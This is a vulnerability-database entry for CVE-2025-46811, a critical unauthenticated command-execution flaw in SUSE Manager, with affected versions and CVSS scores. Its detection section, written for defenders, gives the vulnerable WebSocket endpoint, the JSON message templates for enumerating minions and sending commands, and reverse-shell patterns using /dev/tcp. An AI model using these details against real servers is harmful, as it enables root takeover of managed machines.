cbcvebase.
CVE-2025-46811
published 2025-07-30

CVE-2025-46811: A Missing Authorization vulnerability in SUSE Linux Manager allows anyone with the ability to connect to port 443 of SUSE Manager is able to run any command as…

PriorityP276critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
10.35%
95.1th percentile
A Missing Authorization vulnerability in SUSE Linux Manager allows anyone with the ability to connect to port 443 of SUSE Manager is able to run any command as root on any client. This issue affects Container suse/manager/5.0/x86_64/server:5.0.5.7.30.1: from ? before 5.0.27-150600.3.33.1; Image SLES15-SP4-Manager-Server-4-3-BYOS: from ? before 4.3.87-150400.3.110.2; Image SLES15-SP4-Manager-Server-4-3-BYOS-Azure: from ? before 4.3.87-150400.3.110.2; Image SLES15-SP4-Manager-Server-4-3-BYOS-EC2: from ? before 4.3.87-150400.3.110.2; Image SLES15-SP4-Manager-Server-4-3-BYOS-GCE: from ? before 4.3.87-150400.3.110.2; SUSE Manager Server Module 4.3: from ? before 4.3.87-150400.3.110.2.

Affected

10 ranges
VendorProductVersion rangeFixed in
msrcazl3_kernel_6.6.47.1-1_on_azure_linux_3.0
msrcazl3_kernel_6.6.51.1-5_on_azure_linux_3.0
msrcazure_linux_3.0_arm
msrcazure_linux_3.0_x64
susecontainer_suse_manager_5.0_x86_64_server_5.0.5.7.30.1>= ? < 5.0.27-150600.3.33.15.0.27-150600.3.33.1
suseimage_sles15-sp4-manager-server-4-3-byos>= ? < 4.3.87-150400.3.110.24.3.87-150400.3.110.2
suseimage_sles15-sp4-manager-server-4-3-byos-azure>= ? < 4.3.87-150400.3.110.24.3.87-150400.3.110.2
suseimage_sles15-sp4-manager-server-4-3-byos-ec2>= ? < 4.3.87-150400.3.110.24.3.87-150400.3.110.2
suseimage_sles15-sp4-manager-server-4-3-byos-gce>= ? < 4.3.87-150400.3.110.24.3.87-150400.3.110.2
susesuse_manager_server_module_4.3>= ? < 4.3.87-150400.3.110.24.3.87-150400.3.110.2

Detection & IOCsextracted from sources · hover to see the quote

url/rhn/websocket/minion/remote-commands
port443
other{"preview": true, "target": "*"}
other{"preview": false, "target": "<minion>", "command": "<payload>"}
  • Monitor for unauthenticated WebSocket connections to /rhn/websocket/minion/remote-commands on port 443; any connection from an unexpected source without a valid session should be treated as exploitation of CVE-2025-46811.
  • Detect WebSocket messages containing JSON keys 'preview' and 'target' with wildcard value '*' as the initial reconnaissance phase of the exploit (minion enumeration).
  • Detect WebSocket messages containing JSON keys 'preview': false, 'target', and 'command' as the payload delivery phase; the 'command' field will contain the attacker's shell command (e.g., reverse shell via /dev/tcp).
  • Alert on reverse shell patterns in process execution on SUSE Manager clients, specifically 'sh -i' combined with /dev/tcp redirections, as these indicate successful exploitation resulting in root command execution.
  • The exploit uses Python websocket-client library; network signatures should look for WebSocket upgrade requests to /rhn/websocket/minion/remote-commands without a corresponding authenticated session cookie.
  • ·The vulnerability affects SUSE Manager 4.3.x and 5.0.x as well as Uyuni 2025.05; patched versions are 4.3.87-150400.3.110.2 and 5.0.27-150600.3.33.1 respectively. Ensure patched versions are deployed before relying solely on detection.
  • ·The exploit supports both SSL (wss://) and plaintext (ws://) WebSocket connections; detection rules must cover both schemes on port 443 and any non-standard ports.
  • ·The exploit retries up to 4 times with 15-second delays between attempts; rate-based detection thresholds should account for this slow-retry pattern to avoid missing low-and-slow exploitation.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vendor_msrc7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.